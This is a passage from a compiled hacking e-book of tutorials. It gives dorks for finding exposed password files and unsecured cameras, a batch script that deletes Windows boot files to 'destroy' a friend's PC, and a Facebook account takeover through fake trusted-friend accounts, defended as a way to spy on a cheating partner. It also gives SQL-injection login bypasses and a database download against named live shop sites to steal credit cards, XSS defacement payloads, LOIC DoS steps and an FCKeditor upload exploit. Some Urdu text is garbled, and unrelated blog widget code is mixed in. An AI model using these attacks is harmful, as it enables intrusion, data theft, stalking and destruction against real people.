Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree syntax to get a list links to webserver which has got directory browsing enabled will be discussed below. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily.
Index of /admin Index of /passwd Index of /password Index of /mail
"Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess
"Index of /secret" "Index of /confidential" "Index of /root" "Index of /cgi-bin" "Index of /credit-card" "Index of /logs" "Index of /config" Looking for vulnerable sites or servers using “inurl:” or “allinurl:” a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it. b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link: Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 275
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree http://www.securiteam.com/exploits/2BUQ4S0SAW.html c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. If this file is compromised and if contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”. d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials. For Example: Ingenium Learning Management System is a Web-based application for Windows based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 stores sensitive information insecurely in the config.txt file. For more information refer the following links: http://www.securiteam.com/securitynews/6M00H2K5PG.html Other similar search using “inurl:” or “allinurl:” combined with other syntax inurl:admin filetype:txt inurl:admin filetype:db inurl:admin filetype:cfg inurl:mysql filetype:cfg inurl:passwd filetype:txt inurl:iisadmin inurl:auth_user_file.txt inurl:orders.txt inurl:"wwwroot/*." inurl:adpassword.txt inurl:webeditor.php inurl:file_upload.php
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 276
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree inurl:gov filetype:xls "restricted" index of ftp +.mdb allinurl:/cgi-bin/ +mailto Looking for vulnerable sites or servers using “intitle:” or “allintitle:” a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests. b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests. Other similar search using “intitle:” or “allintitle:” combined with other syntax intitle:"Index of" .sh_history intitle:"Index of" .bash_history intitle:"index of" passwd intitle:"index of" people.lst intitle:"index of" pwd.db intitle:"index of" etc/shadow intitle:"index of" spwd intitle:"index of" master.passwd intitle:"index of" htpasswd intitle:"index of" members OR accounts intitle:"index of" user_carts OR user_cart
allintitle: sensitive filetype:doc allintitle: restricted filetype :mail allintitle: restricted filetype:doc site:gov Other interesting Search Queries: • To search for sites vulnerable to Cross-Sites Scripting (XSS) attacks: Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 277
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree allinurl:/scripts/cart32.exe allinurl:/CuteNews/show_archives.php allinurl:/phpinfo.php To search for sites vulnerable to SQL Injection attacks: allinurl:/privmsg.php allinurl:/privmsg.php Hack Tutrtial:-
FIND OUT YOUR FRIENDS IP ADDRESS
How do u find out your friends IP address without asking him?
Go to Start-->Run-->type in CMD-->Type in netstat, and look at the list given...... If you know his ISP you will be able to tell which is his, and which isn't. Finding the IP is simple, just type in netstat -n. The hostname will be like 890atlanticbb.net:3030 so when you type in netstat -n, look for the number ending in 3030. The IP would be 12.125.46.2:3030 Hack Tutrial:-
OPEN LOCKED OR PASSWORD PROTECTED MS-EXCEL DOCUMENTS - HOW TO? Do you forget your MS-Excel file's Password?? Is there any way to open it?? Of-course YES my Friends. Now open any password protected Microsoft Excel file easily without knowing any password. Just follow the steps below to open your locked/password protected MS-Excel file.
HOW TO OPEN PASSWORD PROTECTED MICROSOFT EXCEL DOCUMENTS: There are two ways to open a password protected MS-excel file without knowing it's actual Password, either by decrypting the entire excel file or by recovering the original password. I’ll summarize the steps in a simple way below. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 278
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Download office password recovery tool from this link. Install the application with the default options. Run the application and navigate to the password protected file by clicking the open button provided in the top left of the window.
This launches the recovery wizard.Here you can find two options.
a) 100% instant document decryption - This method is the fastest and it strips all the password protection from the msexcel document. b)Recover the password to open - While this method just finds the original password of the excel file.
Choose any of the option and recover the password protected Excel document.
If you have any doubts related to this trick then please feel free to ask in the comment section below. Enjoy..!! Hack Tutrial:-
NEVER BREAK YOUR PASSWORD PROTECT YOUR WINDOWS
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 279
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
1. OPEN "RUN" TYPE SYSKEY 2.click Encryption Enable 3.Click Update. 4. Click to Update 5.Now click password Start-up 6. now Enter password & confirm it ok..
Now Restart ......!!!!
Hack Tutrial:-
HOW TO HACK INTO A LIVE SECURITY CAMERA
HOW TO HACK INTO A LIVE SECURITY CAMERA : Well this is an interesting article. It is a sub-section of a Hacking Technique known as “Google Hacking”. All what we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras? Just Google these following strings and select any result. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 280
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Whoa, you can see a live cam on your PC screen!! The strings are given below:
nurl:”CgiStart?page=”
inurl:/view.shtml
intitle:”Live View / – AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera” (disconnected)
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed” Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 281
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image” (disconnected)
intitle:”i-Catcher Console – Web Monitor”
Hack Tutrial:-
DESTROY ANY COMPUTER EASILY WITH ONE CLICK:
Do not try this at your own computer: Well remember that u don’t try this @ ur own computer in any circumstances because the file we are going to create will reboot the computer once and also delete all the file needed by the computer to restart again,so u got it right well if u r pranking with ur friend or ur enemy remember that his or her will never restart unless new Windows is installed.
Here is the Guide to Destroying Virus: Open up notepad and copy and paste this:
@echo off attrib -r -s -h c:autoexec.bat del c:autoexec.bat attrib -r -s -h c:boot.ini Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 282
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree del c:boot.ini attrib -r -s -h c:ntldr del c:ntldr attrib -r -s -h c:windowswin.ini del c:windowswin.ini And SAVE this file as .bat Now that’s it ur Virus is ready well it’s a Monster Virus . Remember Don’t click on this file in ur Computer.
Hack Tutrial:-
WEBSITE HACKING DIFFERENT TECHNIQUES
Cross-Site Scripting SQL Injection Remote File Inclusion Local File Inclusion Denial of Service Attack Brute-Force Attack
These are some of the common methods to hack a website, let's discuss them below.
Cross-Site Scripting: Cross-Site Scripting is a type of attack in which a hacker inject script into webpages. Their effect may range from a pretty nuisance to a significant security risk. By this way of injecting codes into webpages, a hacker can gain access to sensitive page content, session cookies, and a variety of other information which are maintained by the browser on behalf of the user.
SQL Injection: SQL stands for Structured Query Language, SQL Injection is a another type of web application vulnerability occurring in the database layer of an application. It is mostly used for stealing sensitive data (like Username, Password, Email ID, many more). It takes advantages of improper coding in the web application that allow the attacker to inject SQL commands.
Remote File Inclusion: Remote File Inclusion (RFI) allows an attacker to include a remote file, usually through a script on the web server. A hacker usually upload a file (normally a shell) by tricking the web server on the webpage.
Local File Inclusion: A Local File Inclusion (LFI) is a method to include local files on runtime. This is much same like RFI. This method involves the discovering of /etc/passwd/ file in the web directory.
Denial of Service Attack: Denial of Service Attack (DoS attack) or Distributed Denial of Service attack(DDoS attack) is an attempt to make the computer resource unavailable to its users. These are the common attack nowadays, its main purpose is to obstruct the communication of the victim's computer by forcing the targeted computer(s) to reset.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 283
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Brute-Force Attack: Brute-Force Attack is a method in which an attacker tries to crack every possible letters of the password until the whole password is cracked. The main drawback of this attack is that it takes too much time while cracking the password, as it tries every possible character which can be a part of the password.....
Hack Tutrial:-
HOW TO ADD FACEBOOK POPUP LIKE BOX WIDGET IN BLOGGER Popup facebook like box widget for blogger increase your facebook page fans by adding beautiful facebook like box popup widget in your blog this widget is very useful and recommended widget for bloggers. Feature this widget will appear after 20 second of page load. This popup widget will show only once not again and again because this widget saves some cookies file in user browser and tell to browser don’t open again and again when user delete this browser cookies file and open again your blog so again 1st time it will be show but after this again save cookies in browser and not will be open again. It’s a onetime facebook popup like box for blogger Add below given code in your blogger blog as a widget by HTML/JAVASCRIPT widget How to add widget in blogger? Go to your blog Layout option > Select Add a Gadget option > select Html/Java Script option > Past the below code in Content area field and press save button.
<!-- Facebook Popup Widget START --> <script src='http://ajax.googleapis.com/ajax/libs/jquery/2.0.0/jquery.min.js'></script> <style> #abt-back { display:none; background:rgba(0,0,0,0.8); width:100%; height:100%; position:fixed; top:0; left:0; z-index:99999; } #abt-exit { width:100%; height:100%; } #abt1 { background:white; Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 284
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree width:420px; height:270px; position:absolute; top:58%; left:63%; margin:-220px 0 0 -375px; -webkit-box-shadow: inset 0 0 50px 0 #939393; -moz-box-shadow: inset 0 0 50px 0 #939393; box-shadow: inset 0 0 50px 0 #939393; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; margin: -220px 0 0 -375px; } #abt-fb-popup { float:right; cursor:pointer; background:url(http://1.bp.blogspot.com/-bbwLdKu4Jrg/U2lHcnF75I/AAAAAAAABTg/R8vR04KJEgQ/s1600/close.png) repeat; height:15px; padding:20px; position:relative; padding-right:40px; margin-top:-20px; margin-right:-22px; } .abt-fb-like { height:1px; width:366px; margin:0 auto; background:#F3F3F3; margin-top:16px; position:relative; margin-left:20px; } #linkit,#linkit a.visited,#linkit a,#linkit a:hover { color:#80808B; font-size:10px; margin: 0 auto 5px auto; float:center; } </style> <script type='text/javascript'> //<![CDATA[ jQuery.cookie = function (key, value, options) { Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 285
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree if (arguments.length > 1 && String(value) !== "[object Object]") { options = jQuery.extend({}, options); if (value === null || value === undefined) { options.expires = -1; } if (typeof options.expires === 'number') { var days = options.expires, t = options.expires = new Date(); t.setDate(t.getDate() + days); } value = String(value); return (document.cookie = [ encodeURIComponent(key), '=', options.raw ? value : encodeURIComponent(value), options.expires ? '; expires=' + options.expires.toUTCString() : '', options.path ? '; path=' + options.path : '', options.domain ? '; domain=' + options.domain : '', options.secure ? '; secure' : '' ].join('')); } options = value || {}; var result, decode = options.raw ? function (s) { return s; } : decodeURIComponent; return (result = new RegExp('(?:^|; )' + encodeURIComponent(key) + '=([^;]*)').exec(document.cookie)) ? decode(result[1]) : null; }; //]]> </script> <script type='text/javascript'> jQuery(document).ready(function($){ if($.cookie('popup_user_login') != 'yes'){ $('#abt-back').delay(20000).fadeIn('medium'); $('#abt-fb-popup, #abt-exit').click(function(){ $('#abt-back').stop().fadeOut('medium'); }); } $.cookie('popup_user_login', 'yes', { path: '/', expires: 7 }); }); </script> <div id='abt-back'> <div id='abt-exit'> </div> <div id='abt1'> <div id='abt-fb-popup'> </div> <div class='abt-fb-like'> </div> Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 286
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree <iframe allowtransparency='true' frameborder='0' scrolling='no' src='//www.facebook.com/plugins/likebox.php? href=http://www.facebook.com/mtahirzahid1&width=402&height=255&colorsche me=light& show_faces=true&show_border=false&stream=false&header=false' style='border: none; overflow: hidden; margin-top: -19px; width: 402px; height: 230px;'></iframe><center> <span id="linkit"><a href="http://www.allbloggertips.com/2014/05/how -to-addfacebook-popup-like-box.html">Get This Widget</a></span></center> </div> </div> <!-- Facebook Popup Widget END--> Note Replace mtahirzahid1 with your facebook page ID After Add above code in your blog check your blog if popup like box will not open so detele your browser cookies and check again your blog. Hack Tutrial:-
VP-ASP SHOPPING CART 5.00 EXPLOIT | HACKING CREDIT CARD P2 Here is a small exploit to Hack & Steal Credit card info & many other data from a site .
Step By Step Guide :~#
Go to Google & type this Dork - intitle: VP-ASP Shopping Cart 5.00 l After that the Target URL will look like www.tcsprogramming.net/shopping/diag_dbtest.asp (Demo) Then there you can see many details like xDatabase xDatabas Location xEmail & Many others so the thing we have to do here site get the Database of that particular Website . To get the database we will modify the URL
Live Demo :
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 287
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Target - www.tcsprogramming.net/shopping/diag_dbtest.asp Exploit - http://www.tcsprogramming.net/shopping/shopping550.mdb
So here we have exploited the database to get all the data of the website . Just Replace the diag_dbtest.asp to shopping/shopping550.mdb (xDatabase) . Hack Tutrial:-
HOW YOU CAN HACK A FACEBOOK ACCOUNT
Add caption Within the social networking context, facebook features as one of the most secure and reliable way of chatting with friends. However, its reliability does not guarantee perfection in terms of security from unauthorized access like hacking. Unfortunately, the network’s security was compromised by the increasing curiosity by individuals who want to get in touch with private and personal information. Typical motivating factors for hacking include cheating in relationships. Within an unstable social relationship, people would kill to hack into their partner’s accounts in search of evidence for infidelity. Use of Spy Software Such curious individuals have benefited from appropriate software meant to spy on facebook users on a given device. This software captures screenshots at predetermined intervals, thus it can capture login details during account access process. Despite its efficiency in capturing user’s passwords, most spy software tends to be sneaky and unethical. These undesirable aspects take us to the next trick used in hacking facebook accounts. Trusted Friends Option In the recent past, facebook introduced a feature that allows account owners to recover their lost password using trusted friends option. This feature requires that you have to trust three people within your friends list. After losing your password, three different security codes will be send to the three friends. Afterwards, you will have to ask for the codes from those three people in order to reset your password. In this case, you will have to go through the following steps in executing your personal intentions of acquiring unauthorized information. Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 288
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree Steps of Hacking a Facebook Account a. b. c. d.
Start by creating three fake facebook accounts and ensure that you be-friend the victim Go to facebook.com and click on the Forgot Password link Enter the victim’s profile name and hit “This is my account” link Once in, select the “No longer have access to my Email” option. This will prompt you to enter a recovery email. So enter the recovery email there and “Submit”. e. When asked three security questions, just enter wrong answers and it will take you to the final step. f. Facebook asks you for your three trusted friends. Select the fake accounts you created and submit them for the codes to be sent. g. Take the codes from the three accounts, enter them in the box provided and submit. h. Facebook will automatically send the victim’s Password to the email you entered in step 4. i. Finally you are in your victim’s account checking whatever suits your eagerness.
At this point, you will have to appreciate the fact that hacking of facebook account is contrary to wishes and privacy rights of the victims. However, certain circumstances justifies that information obtained may outweigh the right to privacy in social networking. In this case, we will highlight on the pros and cons of hacking facebook accounts. Pros of Hacking In case the victim was withholding offensive and secret information inside the account, then earlier access to such information may help the hacker from unforeseen misfortunes in the future. This is usually justified in case of infidelity with a cheating spouse. Cons of Hacking Hacking using the Trusted Friends option can be tricky, especially when creating and sending friend requests to the victim with the three fake accounts. Failure to use tactical social engineering skills may make the victim to suspect intentions of the hacker; hence affecting their personal relationship due to loss of trust. Hack Tutrial:-
ADMIN PAGE VULNERABILITY | HACKING CREDIT CARD P1 Here is the second part of Hacking Credit Card . Another easy & working Exploit .
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 289
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Step By Step Guide :~#
Go to Google & type this Dork -
inurl:\"/cart.php?m=\"
After that the Target URL will look like -
http://www.facesbyfelicia.com/store/cart.php?m=view (Demo) . Then now we will find the admin page & hack into the website so we will modify the URL to find the Admin page
Live Demo :
Target - http://www.facesbyfelicia.com/store/cart.php?m=view Exploit - http://www.facesbyfelicia.com/store/admin/
Now you will be asked username & password so write this Username - 'or'1'='1 Password - 'or'1'='1
So as you all know that its will contain many credit card details as its a shopping site !But remember you can go behind the bars for this . Its a big Crime .We have provided this Tutorial to make all of you aware of such hacks Hack Tutral:-
BELOW IS TEXT SELECTION DISABLE SCRIPT GIVEN (COPY AND PASTE) IN HTML/JAVASCRIPT CONTENT BOX <script type="text/javascript"> var omitformtags=["input", "textarea", "select"] omitformtags=omitformtags.join("|") function disableselect(e){ if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1) return false } Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 290
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree function reEnable(){ return true } if (typeof document.onselectstart!="undefined") document.onselectstart=new Function ("return false") else{ document.onmousedown=disableselect document.onmouseup=reEnable } </script> Hack Tutrial:-
MAKE A SNOWFLAKES EFFECT ON THE BLOG <a href="http://24work.blogspot.com" target="_blank" title="Blogger Widgets"><img src="http://safir85.ucoz.com/24work-blogspot/cursor-24work-10.png" border="0" alt="Blogger Widgets" style="position:absolute; top: 0px; right: 0px;" /></a><script type="text/javascript"> //Configure below to change URL path to the snow image var snowsrc="http://4.bp.blogspot.com/gRMrCIOxHyA/TuYTdorVR9I/AAAAAAAAAA0/A2Xc8bCZAeQ/s1600/snow-01.gif" // Configure below to change number of snow to render var no = 10; // Configure whether snow should disappear after x seconds (0=never): var hidesnowtime = 0; // Configure how much snow should drop down before fading ("windowheight" or "pageheight") var snowdistance = "pageheight"; ///////////Stop Config////////////////////////////////// var ie4up = (document.all) ? 1 : 0; var ns6up = (document.getElementById&&!document.all) ? 1 : 0; function iecompattest(){ return (document.compatMode && document.compatMode!="BackCompat")? document.documentElement : document.body } var dx, xp, yp; // coordinate and position variables var am, stx, sty; // amplitude and step variables var i, doc_width = 800, doc_height = 600; if (ns6up) { doc_width = self.innerWidth; doc_height = self.innerHeight; } else if (ie4up) { Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 291
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree doc_width = iecompattest().clientWidth; doc_height = iecompattest().clientHeight; } dx = new Array(); xp = new Array(); yp = new Array(); am = new Array(); stx = new Array(); sty = new Array(); snowsrc=(snowsrc.indexOf("dynamicdrive.com")!=-1)? "http://4.bp.blogspot.com/gRMrCIOxHyA/TuYTdorVR9I/AAAAAAAAAA0/A2Xc8bCZAeQ/s1600/snow-01.gif" : snowsrc for (i = 0; i < no; ++ i) { dx[i] = 0; // set coordinate variables xp[i] = Math.random()*(doc_width-50); // set position variables yp[i] = Math.random()*doc_height; am[i] = Math.random()*20; // set amplitude variables stx[i] = 0.02 + Math.random()/10; // set step variables sty[i] = 0.7 + Math.random(); // set step variables if (ie4up||ns6up) { if (i == 0) { document.write("<div id=\"dot"+ i +"\" style=\"POSITION: absolute; Z-INDEX: "+ i +"; VISIBILITY: visible; TOP: 15px; LEFT: 15px;\"><a href=\"http://dynamicdrive.com\"><img src='"+snowsrc+"' border=\"0\"><\/a><\/div>"); } else { document.write("<div id=\"dot"+ i +"\" style=\"POSITION: absolute; Z-INDEX: "+ i +"; VISIBILITY: visible; TOP: 15px; LEFT: 15px;\"><img src='"+snowsrc+"' border=\"0\"><\/div>"); } } } function snowIE_NS6() { // IE and NS6 main animation function doc_width = ns6up?window.innerWidth-10 : iecompattest().clientWidth-10; doc_height=(window.innerHeight && snowdistance=="windowheight")? window.innerHeight : (ie4up && snowdistance=="windowheight")? iecompattest().clientHeight : (ie4up && !window.opera && snowdistance=="pageheight")? iecompattest().scrollHeight : iecompattest().offsetHeight; for (i = 0; i < no; ++ i) { // iterate for every dot yp[i] += sty[i]; if (yp[i] > doc_height-50) { xp[i] = Math.random()*(doc_width-am[i]-30); yp[i] = 0; stx[i] = 0.02 + Math.random()/10; sty[i] = 0.7 + Math.random(); } dx[i] += stx[i]; Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 292
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree document.getElementById("dot"+i).style.top=yp[i]+"px"; document.getElementById("dot"+i).style.left=xp[i] + am[i]*Math.sin(dx[i])+"px"; } snowtimer=setTimeout("snowIE_NS6()", 10); } function hidesnow(){ if (window.snowtimer) clearTimeout(snowtimer) for (i=0; i<no; i++) document.getElementById("dot"+i).style.visibility="hidden" } if (ie4up||ns6up){ snowIE_NS6(); if (hidesnowtime>0) setTimeout("hidesnow()", hidesnowtime*1000) } </script> <span style="font-size:5px;position:absolute;"><a title='Blogger Widget' href="http://24work.blogspot.com" target='_blank'>Blogspot Tutorial</a></span> Hack Tutrial:-
CROSS SITE SCRIPTING (XSS) EXPLAINED AND COMPLETE WEBSITE DEFACEMENT TUTORIAL.
Cross Site Scripting (XSS) is a vulnerability found in websites which allows an malicious attack/cracker to inject client-side scripts into the web pages. By using this vulnerability an attaker can deface a website, redirection attacks can be done and session cookie stealing is also possiable by exploiting this vulnerability. There are two types of XSS vulnerability found in web applications. 1. Non-persistent 2. Persistent
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 293
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
# Non-persistent Non-persistent type of XSS vulnerability is the most comman one. Nonpersistent XSS happens when a malicious HTML query is done by an attacker and that query is used immiediatly by the server-side to generate the page result.
# Persistent Persistent type of XSS vulnerability is a dangerous kind of vulnerability. This happens when a malicious HTML query is done by the attacker and that query is immediatly saved by the server and is permanently displayed on the normal pages.
In this tutorial I'm going to show you how to deface a XSS vulnerable site via Non-persistent XSS vulnerabillty. In order to find sites vulnerable to XSS use google dorks. The most comman google dork used by attackers to exploit the XSS vulnerability is: inurl:search.php?q= *For more dorks to find XSS vulnerable websites, Click Here. After googling the dork, select any website, and check if it can be exploited.
How to find if the website is XSS vulnerable or not. Example Website: www.website.com/search.php?q= Open the website, you will find a search box. in that search box type this code: <script>alert("XSS Detected !!")</script> And click on search. If the site is vulnerable, you will get a Jquery box saying "XSS Detected", if you got that you can move foreward to deface the website site. Now if you want just to display a simple message like "H4CK3D", Enter the below HTML code and click on search. <h1><center><b>H4CK3D</h1></center></b> *You can edit the above code to change the text color, font etc if you have Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 294
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree some knowledge of HTML.
How to deface. In order to deface the website, take a screenshot of your deface page and upload it on any free image hosting website. After uploading note the image URL. Goto search box and type in there the following code: <center><image src="your deface image URL here"></center> And click on search, Yeah! we are done, your deface image is there on the website. #Mission Accomplished #Website Defacement Sucessful.
#Wait for the next Website Defacement tutorial using Persistent XSS vulnerability, for permeanent deface. Hack Tutrial:-
HACK A WEBSITE WITH DENIAL OF SERVICE ATTACK (DOS)
In this post I will be telling you how to hack a website using DoS (Denial of Service). It is tottally different from Website Defacement. It is a method to bring a website temprorely down or unavaiable which does allow users visiters to browser the website. To get a detailed explanition about DoS attacks read our post DENIAL OF SERVICE(DOS) ATTACK-EXPLAINED. For this tutorial I will be using a famous DoS tool named LOIC (Low Orbit Ion Cannon) created and coded by Anonymous Hackers. Download LOIC (Low Orbit Ion Cannon)
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 295
Power Of Hacking速 Facebook:https://www.facebook.com/HAckingRouterwifiFree
Step 1. Type the Target URL in the URL Box Step 2. Click on LOCKON Step 3. Change the threads to 9001 to getting the maximum success. Step 4. Click the big button " IMMA FIRIN MAH LAZAR!" Hack Tutrial:-
UPLOAD EXPLOIT FCKEDITOR: REMOTE FILE UPLOAD EXPLOIT.
Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 296
Power Of Hacking® Facebook:https://www.facebook.com/HAckingRouterwifiFree
Dork: intitle:"FCKeditor - Uploaders Tests"
Exploit:http://website.domain/fckeditor/editor/filemanager/connectors/uploa dtest.html
By searching this dork you will get many websites, goto to the above mentioned URL and you will get the FCKeditor there. Change the file uploader to PHP then select your .txt deface and click on send it to the server. If the file is uploaded sucessfully you will get a alert saying "File Uploaded with no errors" . See you deface here:
http://www.website.domain/userfiles/yourfilehere http://www.website.domain/path/userfiles/yourfilehere
Note: Some websites even allow to upload .html and .jpg files also. Hack Tutrial:-
XFBML ضبت ھ ک ے اً ذاز ک ے ہ ی ک ٌگ ث ک ف یص اً ج ک شي FACEBOOK ڈی ٹ اپ ض ٹ ی ٹص هجھےfaecbook ه یں ح ی ث یتHTML و ضبحت ک ی طرح ک ص ل ئے ک ے ک رً ے شبهل ث ٹي. ہ ن اةXFBML ہ یں رہ ے جب دی کھ ٌے ٹ ی ک ٌ ی کص ث ک ف یص دو ضرے ک چھ ہ وئ ے ک رت ے ا ض ت عوبل ک ب اً ج ک شي. اى ال گ پ ر ث ک ف یص اپ ٌے دث بئ یں اً ٹر اور دی ں ک ر چ ط پبں ضے ه یں ری ل درج ک وڈ ه یں ث بر ای ڈری ص. دث بئ یں ث ٹي اور ض ی ک ٌڈ. جبئ یں پ ر پ روف بئ ل ک ی آپ اة. ک وڈ: http://m.facebook.com/cyber4rt/posts/226958147350609 Code: http://www.facebook.com/connect/prompt_feed.php?&attachment={%27href%27:%27http:// t.co/q3EzkPR%27,%27name%27:%27%20%3Ccenter%3E%3Cbutton+type%3D%22button% 22%3EMengamankan%20Facebook%20Terbaru%3C/button%3E%3C/center%3E%3Cfb:captc ha%20showalways=%22true%22%20/%3E%3Cinput%20type=%22submit%22%20/%3E%3 C/form%3E%3Cbutton+type%3D%22button%22%3Ekirim%20%3C/button%3E%27} Mail:mtahirzahid@yahoo.com Blog:mtahirzahidsu.blogspot.com Blog:mtahirzahid.blogspot.com Skype:wxyz_786 Page 297
